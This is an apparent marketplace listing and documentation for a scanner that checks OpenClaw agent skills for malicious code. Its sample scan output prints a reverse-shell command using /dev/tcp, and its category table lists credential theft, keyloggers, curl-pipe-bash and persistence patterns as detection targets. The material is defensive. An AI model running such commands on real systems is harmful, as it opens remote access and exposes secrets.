# Send Bomb Dog Sniff to your agent
Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.
## Fast path
- Download the package from Yavira.
- Extract it into a folder your agent can access.
- Paste one of the prompts below and point your agent at the extracted folder.
## Suggested prompts
### New install

```text
I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Tell me what you changed and call out any manual steps you could not complete.
```
### Upgrade existing

```text
I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Summarize what changed and any follow-up checks I should run.
```
## Machine-readable fields
```json
{
  "schemaVersion": "1.0",
  "item": {
    "slug": "skill-bomb-dog-sniff",
    "name": "Bomb Dog Sniff",
    "source": "tencent",
    "type": "skill",
    "category": "安全合规",
    "sourceUrl": "https://clawhub.ai/LvcidPsyche/skill-bomb-dog-sniff",
    "canonicalUrl": "https://clawhub.ai/LvcidPsyche/skill-bomb-dog-sniff",
    "targetPlatform": "OpenClaw"
  },
  "install": {
    "downloadUrl": "/downloads/skill-bomb-dog-sniff",
    "sourceDownloadUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=skill-bomb-dog-sniff",
    "sourcePlatform": "tencent",
    "targetPlatform": "OpenClaw",
    "packageFormat": "ZIP package",
    "primaryDoc": "SKILL.md",
    "includedAssets": [
      ".guardianrc.example.json",
      "PERFECTION_SUMMARY.md",
      "SKILL.md",
      "package.json",
      "patterns.js",
      "safe-download.js"
    ],
    "downloadMode": "redirect",
    "sourceHealth": {
      "source": "tencent",
      "status": "healthy",
      "reason": "direct_download_ok",
      "recommendedAction": "download",
      "checkedAt": "2026-04-23T16:43:11.935Z",
      "expiresAt": "2026-04-30T16:43:11.935Z",
      "httpStatus": 200,
      "finalUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=4claw-imageboard",
      "contentType": "application/zip",
      "probeMethod": "head",
      "details": {
        "probeUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=4claw-imageboard",
        "contentDisposition": "attachment; filename=\"4claw-imageboard-1.0.1.zip\"",
        "redirectLocation": null,
        "bodySnippet": null
      },
      "scope": "source",
      "summary": "Source download looks usable.",
      "detail": "Yavira can redirect you to the upstream package for this source.",
      "primaryActionLabel": "Download for OpenClaw",
      "primaryActionHref": "/downloads/skill-bomb-dog-sniff"
    },
    "validation": {
      "installChecklist": [
        "Use the Yavira download entry.",
        "Review SKILL.md after the package is downloaded.",
        "Confirm the extracted package contains the expected setup assets."
      ],
      "postInstallChecks": [
        "Confirm the extracted package includes the expected docs or setup files.",
        "Validate the skill or prompts are available in your target agent workspace.",
        "Capture any manual follow-up steps the agent could not complete."
      ]
    }
  },
  "links": {
    "detailUrl": "https://openagent3.xyz/skills/skill-bomb-dog-sniff",
    "downloadUrl": "https://openagent3.xyz/downloads/skill-bomb-dog-sniff",
    "agentUrl": "https://openagent3.xyz/skills/skill-bomb-dog-sniff/agent",
    "manifestUrl": "https://openagent3.xyz/skills/skill-bomb-dog-sniff/agent.json",
    "briefUrl": "https://openagent3.xyz/skills/skill-bomb-dog-sniff/agent.md"
  }
}
```
## Documentation

### bomb-dog-sniff v1.2.0 🐕

Like a bomb-sniffing dog for OpenClaw skills

Sniff out malicious skills before they explode in your system. Quarantine → Scan → Install only the safe ones.

### Security Hardening

Fixed command injection vulnerabilities in download functions
Added path traversal protection - Sanitizes all path inputs
Secure quarantine - Randomized directory names with restricted permissions
Binary file detection - Skips binary files to avoid false positives
File size limits - Prevents DoS via huge files
ReDoS protection - Limits regex processing on long lines

### Detection Improvements

Smart false positive reduction - Better context-aware pattern matching
Entropy analysis - Detects encoded/encrypted payloads
Test file awareness - Reduces severity for findings in test files
Confidence scoring - Each finding has confidence level (high/medium/low)
13 detection categories - Added supply chain, prototype pollution, and malicious script detection

### New Patterns

Supply chain attack indicators (typosquatting, dynamic requires)
Prototype pollution vulnerabilities
Malicious npm/yarn scripts
Browser credential theft
SSH key theft
Systemd persistence mechanisms

### Quick Start

# Sniff out threats before installing
openclaw skill bomb-dog-sniff scan ./downloaded-skill

# Safe install from clawhub (auto-downloads, sniffs, installs if clean)
openclaw skill bomb-dog-sniff safe-install cool-skill

# Audit an already-installed skill
openclaw skill bomb-dog-sniff audit bird

# Batch scan multiple skills
openclaw skill bomb-dog-sniff batch skills-to-audit.txt

### scan

Scan a skill directory for malicious patterns.

openclaw skill bomb-dog-sniff scan <path> [options]

Options:
  -j, --json          Output JSON only
  -v, --verbose       Show detailed findings
  -t, --threshold N   Set risk threshold (default: 40)
  -h, --help          Show help

Example:

openclaw skill bomb-dog-sniff scan ./untrusted-skill
openclaw skill bomb-dog-sniff scan -j ./untrusted-skill > report.json

Output:

🔍 Bomb-Dog-Sniff Security Scanner v1.2.0
Target: /home/user/skills/untrusted-skill

🔴 CRITICAL (2)
──────────────────────────────────────────────────
  crypto_harvester: scripts/wallet.js:23
    Crypto wallet private key harvesting detected
    Code: const privateKey = "a1b2c3..."
    Confidence: high

  reverse_shell: scripts/backdoor.sh:5
    Reverse shell or remote code execution detected
    Code: bash -i >& /dev/tcp/192.168.1.100/4444
    Confidence: high

🟠 HIGH (1)
──────────────────────────────────────────────────
  pipe_bash: install.sh:12
    Dangerous curl | bash pattern detected
    Confidence: high

═══════════════════════════════════════════════════
SCAN SUMMARY
═══════════════════════════════════════════════════
☠️ Risk Score: 75/100
   Risk Level: MALICIOUS
   Duration: 125ms
   Files Scanned: 12/15
   Files Skipped: 3 (binary/empty/large)
   Findings: 3

   Severity Breakdown:
     🔴 CRITICAL: 2
     🟠 HIGH: 1

📋 Recommendation:
   MALICIOUS - Do not install. Found 3 critical security issues.

Scan ID: bds-20260208-a1b2c3d4

### safe-install

Download from clawhub/GitHub, scan, and install only if safe.

openclaw skill bomb-dog-sniff safe-install <source> [options]

Source:
  - ClawHub skill name: bird
  - GitHub URL: https://github.com/user/skill
  - Local path: ./local-skill

Options:
  --threshold N   Set risk threshold (default: 39)
  --dry-run       Scan only, don't install
  --verbose       Show all findings

Example:

# Install with default threshold (39)
openclaw skill bomb-dog-sniff safe-install bird

# Stricter threshold
openclaw skill bomb-dog-sniff safe-install cool-skill --threshold 20

# Scan only (dry run)
openclaw skill bomb-dog-sniff safe-install unknown-skill --dry-run

# GitHub source
openclaw skill bomb-dog-sniff safe-install https://github.com/user/cool-skill

### audit

Audit an already-installed skill.

openclaw skill bomb-dog-sniff audit <skill-name> [options]

Example:

openclaw skill bomb-dog-sniff audit notion

### batch

Scan multiple skills from a list file.

openclaw skill bomb-dog-sniff batch <list-file>

Example list file (skills.txt):

# My installed skills to audit
bird
notion
gog
slack
./custom-skill

# Commented lines are ignored
# old-skill

Run:

openclaw skill bomb-dog-sniff batch skills.txt

### Detection Categories

bomb-dog-sniff scans for these threat categories:

CategorySeverityExamples Detectedcrypto_harvesterCRITICALPrivate key extraction, wallet exports, mnemonic theftcredential_theftCRITICALEnvironment variable exfiltration, config file theft, SSH key theftreverse_shellCRITICALNetcat shells, /dev/tcp/ redirects, socket-based shells, eval of remote codekeyloggerCRITICALKeyboard capture with exfiltration, clipboard theft, password field monitoringencoded_payloadHIGHBase64 execution chains, hex escapes with eval context, obfuscated codesuspicious_apiHIGHPastebin/ngrok/webhook destinations, dynamic URL construction with secretspipe_bashHIGHcurl | bash, wget | sh patternsdeposit_scamHIGH"Send ETH to 0x...", payment prompts in unexpected contextssupply_chainHIGHTyposquatting, dynamic requires, suspicious postinstall scriptsprototype_pollutionHIGHDangerous object merging, __proto__ manipulationmalicious_scriptCRITICALPre/postinstall doing network/exec operations, modifying other packagesnetwork_exfilMEDIUMFile reading followed by network transmissionfile_tamperCRITICAL.bashrc modification, crontab editing, SSH authorized_keys manipulation

### Risk Scoring

0-19   SAFE        ✅ Install freely
20-39  LOW         ⚠️  Review recommended
40-69  SUSPICIOUS  🚫 Blocked by default
70-100 MALICIOUS   ☠️  Never install

Each finding adds to the score:

CRITICAL: +25 points (× confidence multiplier)
HIGH: +15 points (× confidence multiplier)
MEDIUM: +5 points (× confidence multiplier)

Confidence multipliers:

High confidence: 1.0×
Medium confidence: 0.75×
Low confidence: 0.5×

Score caps at 100.

### Safe Install Process

1. QUARANTINE
   └── Skill downloaded to /tmp/bds-q-<random>/
   └── Randomized, non-predictable directory name
   └── Restricted permissions (0o700)
   
2. SCAN
   ├── Check all files against detection patterns
   ├── Skip binary files, empty files, files >10MB
   ├── Calculate entropy for encoded payload detection
   ├── Apply confidence multipliers
   └── Generate findings report
   
3. DECISION
   ├── Risk > threshold? → BLOCK & DELETE
   └── Risk ≤ threshold? → PROCEED
   
4. INSTALL (if passed)
   └── Move from quarantine to skills directory
   └── Backup existing installation (max 5 backups)
   
5. CLEANUP
   └── Securely remove quarantine directory

### Scanning Details

Static analysis only - No code execution
Multi-pattern matching - 60+ detection patterns
Line-level reporting - Exact file:line for each finding
False positive reduction - Context-aware pattern matching
Binary detection - Automatically skips binary files
Symlink loop protection - Tracks visited inodes
Depth limiting - Max 20 directory levels
Test file handling - Reduces severity for test files

### Environment Variables

# Set custom skills directory
export OPENCLAW_SKILLS_DIR=/path/to/skills

# Set default risk threshold
export BOMB_DOG_THRESHOLD=25

### Per-Skill Configuration

Add to your skill's package.json:

{
  "bomb-dog-sniff": {
    "riskThreshold": 25,
    "excludedCategories": ["network_exfil"]
  }
}

### CI/CD Integration

Add to your CI pipeline:

# .github/workflows/skill-security.yml
name: Skill Security Scan

on: [push, pull_request]

jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      
      - name: Scan skills
        run: |
          for skill in skills/*/; do
            echo "Scanning $skill"
            node skills/bomb-dog-sniff/scan.js "$skill" || exit 1
          done

Exit codes:

0 - Safe (score below threshold)
1 - Error/invalid arguments
2 - Risky (score ≥ threshold)

### Programmatic API

const { scanSkill } = require('./scan');
const { safeDownload } = require('./safe-download');

// Scan a skill
const report = scanSkill('./path/to/skill', { verbose: true });
console.log(\`Risk score: ${report.riskScore}\`);
console.log(\`Findings: ${report.findings.length}\`);

// Safe download and install
const result = await safeDownload('cool-skill', {
  autoInstall: true,
  riskThreshold: 30,
});

if (!result.success) {
  console.error('Installation blocked:', result.reason);
}

### Security Limits

To prevent DoS and ensure scanner security:

LimitValuePurposeMax file size10MBPrevent memory exhaustionMax line length10KBPrevent ReDoS attacksMax files per scan10,000Prevent resource exhaustionMax findings per file100Prevent output floodingMax total findings500Prevent result floodingMax directory depth20Prevent infinite recursionDownload timeout2 minutesPrevent hanging downloadsMax download size50MBPrevent disk exhaustion

### False Positives

If legitimate code triggers a warning:

Check confidence level - Low confidence findings are more likely to be false positives
Review the excerpt - Look at the actual code flagged
Test files are noted - Findings in *.test.js or __tests__/ have reduced severity
Comments are generally skipped - Unless they contain suspicious keywords

To report false positives, please include:

The file content that triggered the false positive
The pattern category that matched
Expected behavior

### Best Practices

Always scan before installing unknown skills
Use --dry-run first for untrusted sources
Set lower threshold (--threshold 20) for critical systems
Audit regularly - Rescan installed skills periodically
Review CRITICAL findings - Never ignore critical severity warnings
Check confidence levels - High confidence = higher priority

### Files

SKILL.md - This documentation
scan.js - Core scanner engine
patterns.js - Detection pattern definitions
safe-download.js - Safe download & install logic
scripts/sniff.sh - CLI wrapper
package.json - Package configuration
QUICKSTART.md - Quick reference guide

### Security Notes

⚠️ Limitations:

Static analysis only (some obfuscation may evade detection)
Pattern-based (novel attacks may not be detected)
Not a replacement for manual code review on critical systems
Cannot detect runtime-only malicious behavior

✅ Recommendations:

Use bomb-dog-sniff as first line of defense
Review code manually for high-security environments
Keep patterns.js updated with new threat signatures
Report false positives and missed detections
Combine with other security tools for defense in depth

### v1.2.0 (Hardened Edition)

SECURITY: Fixed command injection vulnerabilities in safe-download.js
SECURITY: Added path traversal protection
SECURITY: Secure randomized quarantine directories
FEATURE: Binary file detection and skipping
FEATURE: File size limits (10MB per file, 50MB download)
FEATURE: Entropy analysis for encoded payload detection
FEATURE: Confidence scoring for all findings
FEATURE: Test file awareness with severity reduction
FEATURE: 3 new detection categories (supply_chain, prototype_pollution, malicious_script)
IMPROVEMENT: Better false positive reduction with context-aware matching
IMPROVEMENT: ReDoS protection via line length limits
IMPROVEMENT: Symlink loop protection
IMPROVEMENT: Backup rotation (max 5 backups)

### v1.1.0

Added safe-install command with quarantine workflow
Added audit command for installed skills
Added batch command for multiple skill scanning
Enhanced detection patterns (50+ signatures)
Added risk threshold configuration

### v1.0.0

Initial release with basic scanning
10 detection categories
JSON output format

### License

MIT - See LICENSE file

Stay safe. Scan everything. Trust verified skills only. 🦞🐕
## Trust
- Source: tencent
- Verification: Indexed source record
- Publisher: LvcidPsyche
- Version: 0.1.0
## Source health
- Status: healthy
- Source download looks usable.
- Yavira can redirect you to the upstream package for this source.
- Health scope: source
- Reason: direct_download_ok
- Checked at: 2026-04-23T16:43:11.935Z
- Expires at: 2026-04-30T16:43:11.935Z
- Recommended action: Download for OpenClaw
## Links
- [Detail page](https://openagent3.xyz/skills/skill-bomb-dog-sniff)
- [Send to Agent page](https://openagent3.xyz/skills/skill-bomb-dog-sniff/agent)
- [JSON manifest](https://openagent3.xyz/skills/skill-bomb-dog-sniff/agent.json)
- [Markdown brief](https://openagent3.xyz/skills/skill-bomb-dog-sniff/agent.md)
- [Download page](https://openagent3.xyz/downloads/skill-bomb-dog-sniff)